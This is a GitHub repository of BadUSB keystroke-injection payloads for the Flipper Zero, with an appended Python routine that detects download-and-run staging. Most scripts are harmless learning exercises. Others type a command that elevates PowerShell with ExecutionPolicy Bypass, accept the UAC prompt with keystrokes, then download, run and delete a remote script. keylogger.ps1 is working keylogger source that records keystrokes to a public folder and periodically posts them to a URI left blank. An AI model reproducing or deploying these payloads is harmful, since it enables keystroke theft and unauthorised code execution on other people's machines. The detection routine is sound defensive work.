├── Powershell
    ├── deleteFile.ps1
    └── nearbyNetworks.ps1
├── KeystrokeInjection
    ├── printingText.txt
    ├── makingADirectory.txt
    ├── creatingFile.txt
    ├── readAndSteal.txt
    ├── refiningReadandSteal.txt
    └── deleteFile.txt
├── Wifi
    └── nearbyNetworks.txt
├── Keylogger
    └── keylogger.ps1
└── README.md


/Powershell/deleteFile.ps1:
--------------------------------------------------------------------------------
$targets = @('C:\GoodUSBTest', 'C:\CopyTest')

foreach ($target in $targets) {
    Remove-Item -path $target -recurse
}

--------------------------------------------------------------------------------
/Powershell/nearbyNetworks.ps1:
--------------------------------------------------------------------------------
# display the nearby networks using Write-Host

$nearbyNetworks = netsh wlan show networks mode=Bssid

$filteredNetworks = $nearbyNetworks | Select-String "SSID", "Authentication", "Encryption"

Write-Host "Script #7 Running..."
Write-Host "List of Nearby Networks:"
Write-Host $filteredNetworks

--------------------------------------------------------------------------------
/KeystrokeInjection/printingText.txt:
--------------------------------------------------------------------------------
REM Script #1: Printing Text on Terminal
REM Desc: Trying out Keystroke Injections
REM Author: Ainsley Cabading
REM Windows 10 PowerShell

REM Opening Terminal
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

REM ^ It's important to add delays in order to let the GUI load

REM Doing the echo

STRING echo Test #1
ENTER

--------------------------------------------------------------------------------
/KeystrokeInjection/makingADirectory.txt:
--------------------------------------------------------------------------------
REM Script #2: Making a Directory
REM Desc: Learning new Powershell Commands
REM Author: Ainsley Cabading
REM Meant for Windows 10

REM Opening Terminal
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
REM ^ It's important to add delays in order to let the GUI load

REM Creating the directory

STRING ni -Path C:\GoodUSBTest_1 -ItemType Directory
ENTER
DELAY 1000
STRING echo Test#2_Completed
ENTER

--------------------------------------------------------------------------------
/KeystrokeInjection/creatingFile.txt:
--------------------------------------------------------------------------------
REM Script #3: Making a Directory, Creating a File and Adding Text Content
REM Desc: Trying to create more complicated scripts
REM Author: Ainsley Cabading
REM Meant for Windows 10

REM Opening Terminal
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

REM Creating the directory
STRING ni -Path C:\GoodUSBTest -ItemType Directory
ENTER
DELAY 500

REM Moving to created directory
STRING cd C:\GoodUSBTest
ENTER
DELAY 500

REM Creating the file
STRING ni -Path C:\GoodUSBTest\Test1.txt -ItemType File
ENTER
DELAY 500

REM Setting content inside file
STRING Set-Content -Path .\Test1.txt -Value "Script#3 Works!"
ENTER
DELAY 500

REM Checking if file exists
STRING Test-Path .\Test1.txt
ENTER
DELAY 500

REM Opening File
STRING ii .\Test1.txt
ENTER

STRING echo Test#3_Completed
ENTER

--------------------------------------------------------------------------------
/Wifi/nearbyNetworks.txt:
--------------------------------------------------------------------------------
REM Script #7: Discovering Nearby Wifi Networks
REM Desc: Simple enumeration of nearby Wifi networks using Network Shell (netsh)
REM Author: Ainsley Cabading
REM Meant for Windows 10

REM Running Powershell as an Admin
GUI r
DELAY 200
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs"
ENTER
DELAY 1000
SHIFT TAB
DELAY 500
ENTER
DELAY 1500
STRING cd C:\
ENTER

REM Downloading the nearbyNetworks.ps1 from GitHub and running it
STRING (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/aenslei/flipperZero-studies/main/Powershell/nearbyNetworks.ps1', 'C:\nearbyNetworks.ps1')
ENTER
DELAY 1000
STRING .\nearbyNetworks.ps1
ENTER

REM Deleting the nearbyNetworks.ps1
STRING Remove-Item -path nearbyNetworks.ps1
ENTER
DELAY 500

REM Test Case
STRING echo Script#7 Completed
ENTER
--------------------------------------------------------------------------------
/KeystrokeInjection/readAndSteal.txt:
--------------------------------------------------------------------------------
REM Script #4: Read the content of a file and duplicate it to another folder
REM Desc: Kinda like stealing the shadow or passwd file HEHE... but layman
REM Author: Ainsley Cabading
REM Meant for Windows 10

REM Opening Terminal
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

REM Checking if the target file exists
STRING Test-Path C:\GoodUSBTest\Test1.txt
ENTER

REM Echoing file contents
STRING Get-Content -Path C:\GoodUSBTest\Test1.txt
ENTER
DELAY 500

REM Making a folder to place the duplicate in
STRING New-Item -Path C:\CopyTest -ItemType Directory
ENTER

REM Duplicating file
STRING Copy-Item -Path C:\GoodUSBTest\Test1.txt -Destination C:\CopyTest\CopiedTest1.txt
ENTER

REM Adding content of the duplicate and opening it
STRING Add-Content -Path C:\CopyTest\CopiedTest1.txt -Value "This was copied!! Script#4 work :D good job"
ENTER
STRING ii -Path C:\CopyTest\CopiedTest1.txt
ENTER

STRING echo Test#4_Completed
ENTER

--------------------------------------------------------------------------------
/Keylogger/keylogger.ps1:
--------------------------------------------------------------------------------
#Keylogger Powershell Script
# For Testing - STANDCON

Add-Type -TypeDefinition @'
using System;
using System.IO;
using System.Runtime.InteropServices;
public class KeyLogger {
    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(int i);
    public static void Start() {
        string path = "C:\\Users\\Public\\keylog.txt";
        while (true) {
            System.Threading.Thread.Sleep(100);
            for (int i = 8; i < 256; i++) {
                if (GetAsyncKeyState(i) == -32767) {
                    File.AppendAllText(path, ((char)i).ToString());
                }
            }
        }
    }
}
'@ -Language CSharp

Start-Job -ScriptBlock { [KeyLogger]::Start() }

while ($true) {
    if (Test-Path "C:\Users\Public\keylog.txt") {
        $logs = Get-Content "C:\Users\Public\keylog.txt" -Raw
        Invoke-RestMethod -Uri "" -Method Post -Body @{content=$logs}
        Clear-Content "C:\Users\Public\keylog.txt"
    }
    Start-Sleep -Seconds 20
}

--------------------------------------------------------------------------------
/KeystrokeInjection/refiningReadandSteal.txt:
--------------------------------------------------------------------------------
REM Script #5: Refined readAndSteal.txt
REM Desc: Refining the readAndSteal.txt script by refactoring it using DEFINE and VAR
REM Author: Ainsley Cabading
REM Meant for Windows 10

REM Defining TargetFile, DupeFolder and Destination
DEFINE #TARGET C:\GoodUSBTest\Test1.txt
VAR $DUPE = C:\CopyTest

REM Opening Terminal
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

REM Checking if the target file exists
STRING Test-Path #TARGET
ENTER

REM Echoing file contents
STRING Get-Content -Path #TARGET
ENTER
DELAY 500

REM Making a folder to place the duplicate in + Changing DUPE into duplicateTextFile directory
STRING New-Item -Path $DUPE -ItemType Directory
ENTER
DELAY 200
VAR $DUPE = C:\CopyTest\CopiedTest1.txt

REM Duplicating file
STRING Copy-Item -Path #TARGET -Destination $DUPE
ENTER

REM Adding content of the duplicate and opening it
STRING Add-Content -Path $DUPE -Value "This was copied!! Script#5 works. Learnt DEFINE and VAR duckyScript usage."
ENTER
STRING ii -Path $DUPE
ENTER

STRING echo Test#5_Completed
ENTER

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# flipperZero-studies
Learning how to create simple USB payloads using duckyScript and Powershell for the Flipper Zero!
Documenting my self-led journey in learning how to write USB payloads.

# Wifi
Consists of all my Wifi-related duckyScripts.

**Script #7**: nearbyNetworks.txt
*A simple script that enumerates nearby Wifi networks.*

# Powershell Basics and Keystroke Injection
This first folder consists of all my attempts to master Powershell and Keystroke Injections on Windows machines

**Script #6**: deleteFile.txt

*Deletes a file using an externally downloaded Powershell script and deletes said script after. I learnt a LOT in this script.*

**Script #5**: refiningReadAndDupe.txt
*This was a failed experiment, unfortunately. I had no idea that the FZ BadUSB didn't take in DEFINE and VAR in duckyScript. Sad :(*

**Script #4**: readAndDupe.txt
*Read the content of a file and duplicate it to another folder.*

**Script #3**: creatingFile.txt
*Created a new directory, made a text file and added content into it before opening up.*

**Script #2**: makingADirectory.txt
*Also self explanatory.*

**Script #1**: printingText.txt
*Self explanatory. I got text echoed on a Powershell CLI.*

--------------------------------------------------------------------------------
/KeystrokeInjection/deleteFile.txt:
--------------------------------------------------------------------------------
REM Script #6: Deleting Folders
REM Desc: Deleting Folders based on a target list. Learnt how to use SHIFT TAB and download and run a Powershell script from GitHub!
REM Author: Ainsley Cabading
REM Meant for Windows 10

REM Running Powershell as an Admin
GUI r
DELAY 200
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs"
ENTER
DELAY 1000
SHIFT TAB
DELAY 500
ENTER
DELAY 1500
STRING cd C:\
ENTER

REM If ExecutionPolicy Bypass does not work, you can use the base64 encoded version of the command.
REM $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell -NoProfile -ExecutionPolicy Bypass -Command `"Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs`""))
REM powershell.exe -EncodedCommand $encodedCommand

REM Downloading the deleteFile.ps1 from GitHub and running it
STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/aenslei/flipperZero-studies/raw/main/Powershell/deleteFile.ps1', 'C:\deleteFile.ps1')
ENTER
DELAY 1000
STRING .\deleteFile.ps1
ENTER

REM Deleting the deleteFile.ps1
STRING Remove-Item -path deleteFile.ps1
ENTER
DELAY 500

REM Test Case
STRING echo Script#6 Completed
ENTER
--------------------------------------------------------------------------------
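
Added example (not part of the repository above): a Python detection routine a defender could run over collected PowerShell command text to flag the download, run, delete staging sequence that Script #6 and Script #7 type, plus the single-line indicators that appear in these files. The event tuples, the `example.invalid` URL, the `stage.ps1` name and all function names are constructed for illustration.

```python
import ntpath
import re

# Constructed sample, not real telemetry: (seconds, command text) pairs shaped like
# merged process-creation and script-block records. URL and file name are placeholders.
SAMPLE_EVENTS = [
    (0.0, "powershell -NoProfile -ExecutionPolicy Bypass -Command \"Start-Process "
          "powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs\""),
    (2.0, "cd C:\\"),
    (2.4, r"(New-Object System.Net.WebClient).DownloadFile("
          r"'https://example.invalid/stage.ps1', 'C:\stage.ps1')"),
    (3.5, r".\stage.ps1"),
    (3.9, "Remove-Item -path stage.ps1"),
]

DOWNLOAD = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
INDICATORS = {
    "execution-policy-bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "elevation-via-runas": re.compile(r"-Verb\s+RunAs", re.I),
    "encoded-command": re.compile(r"-EncodedCommand\b", re.I),
    "key-state-polling": re.compile(r"GetAsyncKeyState", re.I),
}

def single_indicators(events):
    """Sorted names of the one-line indicators present anywhere in the events."""
    return sorted({name for _, text in events
                   for name, rx in INDICATORS.items() if rx.search(text)})

def staged_script_chains(events, window=60.0):
    """Find download -> run -> delete of the same file name within `window` seconds."""
    chains = []
    for i, (t0, text) in enumerate(events):
        m = DOWNLOAD.search(text)
        if not m:
            continue
        url, dest = m.groups()
        name = re.escape(ntpath.basename(dest))
        # Run: the script invoked by relative or absolute path at the start of a command.
        run = re.compile(r"^\s*(?:&\s*)?(?:\.\\|[A-Za-z]:\\(?:[^\\\s]+\\)*)" + name + r"\b", re.I)
        # Delete: Remove-Item or one of its common aliases naming the same file.
        delete = re.compile(r"\b(?:Remove-Item|rm|del|ri)\b.*" + name, re.I)
        later = [(t, s) for t, s in events[i + 1:] if t - t0 <= window]
        ran = next((t for t, s in later if run.search(s)), None)
        gone = next((t for t, s in later
                     if ran is not None and t > ran and delete.search(s)), None)
        if ran is not None and gone is not None:
            chains.append({"url": url, "dest": dest, "ran_at": ran, "deleted_at": gone})
    return chains
```

A chain is reported only when all three steps name the same file inside the time window, which keeps ordinary downloads and ordinary clean-up commands from alerting on their own.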